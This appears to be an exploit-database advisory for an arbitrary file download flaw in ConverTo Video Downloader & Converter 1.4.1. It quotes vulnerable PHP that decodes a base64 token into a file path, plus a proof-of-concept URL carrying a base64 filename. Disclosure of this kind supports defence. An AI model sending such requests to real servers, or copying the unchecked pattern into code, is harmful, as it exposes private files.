vendor:
ConverTo Video Downloader & Converter
by:
Ihsan Sencan
N/A
CVSS
N/A
Arbitrary File Download
N/A
CWE
Product Name: ConverTo Video Downloader & Converter
Affected Version From: 1.4.1
Affected Version To: 1.4.1
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
ConverTo Video Downloader & Converter 1.4.1 – Arbitrary File Download
The security obligation allows an attacker to arbitrary download files. Vulnerable Source: include_once('.......php'); // Check download token if (empty($_GET['mime']) OR empty($_GET['token'])) { exit('Invalid download token 8{'); } // Set operation params $mime = filter_var($_GET['mime']); $ext = str_replace(array('/', 'x-'), '', strstr($mime, '/')); $url = base64_decode(filter_var($_GET['token'])); $name = urldecode($_GET['title']). '.' .$ext; Proof of Concept: http://localhost/[PATH]/download.php?mime=video/webm&title=Efe&token=[FILENAME_to_BASE64]
Mitigation:
N/A